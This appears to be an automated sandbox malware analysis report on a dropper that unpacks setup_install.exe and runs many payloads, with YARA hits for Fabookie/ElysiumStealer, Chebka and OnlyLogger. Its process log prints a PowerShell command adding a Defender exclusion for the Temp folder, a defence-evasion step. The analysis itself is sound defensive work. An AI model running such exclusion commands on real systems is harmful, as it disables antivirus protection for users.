                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043E8605_2_0043E860
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004348E05_2_004348E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043A9405_2_0043A940
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043C9205_2_0043C920
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00440B705_2_00440B70
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00442B905_2_00442B90
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00432C405_2_00432C40
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00414D005_2_00414D00
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00446EB05_2_00446EB0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00430F105_2_00430F10
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00412F905_2_00412F90
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004171D05_2_004171D0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043B3705_2_0043B370
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004515405_2_00451540
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004416205_2_00441620
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004116E05_2_004116E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004436E05_2_004436E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040D7605_2_0040D760
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040D7205_2_0040D720
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004157A05_2_004157A0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004199405_2_00419940
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043D9205_2_0043D920
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0042D9F05_2_0042D9F0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00433BA05_2_00433BA0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040BD105_2_0040BD10
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043BE705_2_0043BE70
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00431F305_2_00431F30
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0040DFC05_2_0040DFC0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042E01614_2_0042E016
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042B0C714_2_0042B0C7
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_004200BF14_2_004200BF
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041F4BF14_2_0041F4BF
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042E55814_2_0042E558
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_004206D014_2_004206D0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_004266FD14_2_004266FD
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041F89314_2_0041F893
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042DAD414_2_0042DAD4
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00425BDC14_2_00425BDC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042EC1C14_2_0042EC1C
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041FC9F14_2_0041FC9F
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0042FD3114_2_0042FD31
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0040BDEA14_2_0040BDEA
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041EFEC14_2_0041EFEC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00422FA114_2_00422FA1
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_004323DC16_2_004323DC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_004255DC16_2_004255DC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0040E9C416_2_0040E9C4
                    Source: T4IoJqcAwY.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925d5ee10_0da12a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925ea53e7_da60dc03.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829251169ea_9dc91d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829251169ea_9dc91d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829251169ea_9dc91d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925776f05_4ee107b.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925776f05_4ee107b.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: JFv6.cpl.20.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: SKG1KLB0.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SKG1KLB0.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SKG1KLB0.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SKG1KLB0.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: qKVHB75j.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: qKVHB75j.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: qKVHB75j.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: qKVHB75j.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: MIXONE[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: MIXONE[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: MIXONE[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: MIXONE[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: D3[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: D3[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: D3[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: D3[1].file.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeSection loaded: dxgidebug.dll
                    Source: libstdc++-6.dll.0.drStatic PE information: Number of sections : 12 > 10
                    Source: setup_install.exe.0.drStatic PE information: Number of sections : 16 > 10
                    Source: T4IoJqcAwY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
                    Source: 00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                    Source: 00000038.00000000.390207801.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000038.00000000.390207801.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                    Source: 0000001F.00000002.351468140.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORYMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                    Source: 00000038.00000002.758366144.000001F05CAA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000038.00000002.758366144.000001F05CAA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                    Source: 00000038.00000003.619186728.000001F05CA30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000038.00000002.758120668.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000038.00000002.758120668.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                    Source: 00000033.00000002.428755531.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: 00000033.00000002.428755531.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
                    Source: 0000001F.00000003.328543669.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                    Source: 00000038.00000003.387854495.000001F05C940000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,16_2_004AF110
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: String function: 00403204 appears 37 times
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: String function: 00418D80 appears 123 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: String function: 0042066C appears 52 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: String function: 0041E981 appears 141 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: String function: 0040D7BC appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: String function: 0041E9B4 appears 39 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: String function: 00491870 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: String function: 00491290 appears 50 times
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: qKVHB75j.exe.22.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                    Source: D3[1].file.22.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                    Source: T4IoJqcAwY.exe, 00000000.00000000.228070224.0000000000423000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs T4IoJqcAwY.exe
                    Source: T4IoJqcAwY.exe, 00000000.00000003.254237079.0000000004307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropboxUpdateSetup.exe> vs T4IoJqcAwY.exe
                    Source: T4IoJqcAwY.exe, 00000000.00000003.254237079.0000000004307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinPthreadGCp( vs T4IoJqcAwY.exe
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMlsldfewkfwe.exe" vs T4IoJqcAwY.exe
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMFC.exeJ vs T4IoJqcAwY.exe
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs T4IoJqcAwY.exe
                    Source: libstdc++-6.dll.0.drStatic PE information: Section: .reloc IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                    Source: libstdc++-6.dll.0.drStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Cleaner.exe.22.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: soft[1].22.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: libstdc++-6.dll.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                    Source: libstdc++-6.dll.0.drStatic PE information: Section: /4 ZLIB complexity 0.99873490767
                    Source: libstdc++-6.dll.0.drStatic PE information: Section: .reloc ZLIB complexity 1.00014648438
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: Section: JM`(q ZLIB complexity 1.00033922697
                    Source: T4IoJqcAwY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220521Jump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@77/45@14/21
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00404C4F FindResourceA,LoadResource,LockResource,FreeResource,14_2_00404C4F
                    Source: T4IoJqcAwY.exeVirustotal: Detection: 56%
                    Source: T4IoJqcAwY.exeReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile read: C:\Users\user\Desktop\T4IoJqcAwY.exeJump to behavior
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\T4IoJqcAwY.exe "C:\Users\user\Desktop\T4IoJqcAwY.exe"
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282924fea1c3_82ebfc59.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 628292505a6c3_91a0215e.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe 6282924fea1c3_82ebfc59.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829251169ea_9dc91d.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829252dc457_91e450cbce.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe 62829251169ea_9dc91d.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829254ab49d_fc210c4a.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe 62829252dc457_91e450cbce.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925776f05_4ee107b.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exe 62829254ab49d_fc210c4a.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 62829258f111c_8df26f0c7d.exe /mixtwo
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe 6282925776f05_4ee107b.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925ab52f1_fdd12e5.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe 62829258f111c_8df26f0c7d.exe /mixtwo
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925b8abce_97dd7946.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe 6282925ab52f1_fdd12e5.exe
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 6282925c504be_44b654a9fe.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exe 6282925b8abce_97dd7946.exe
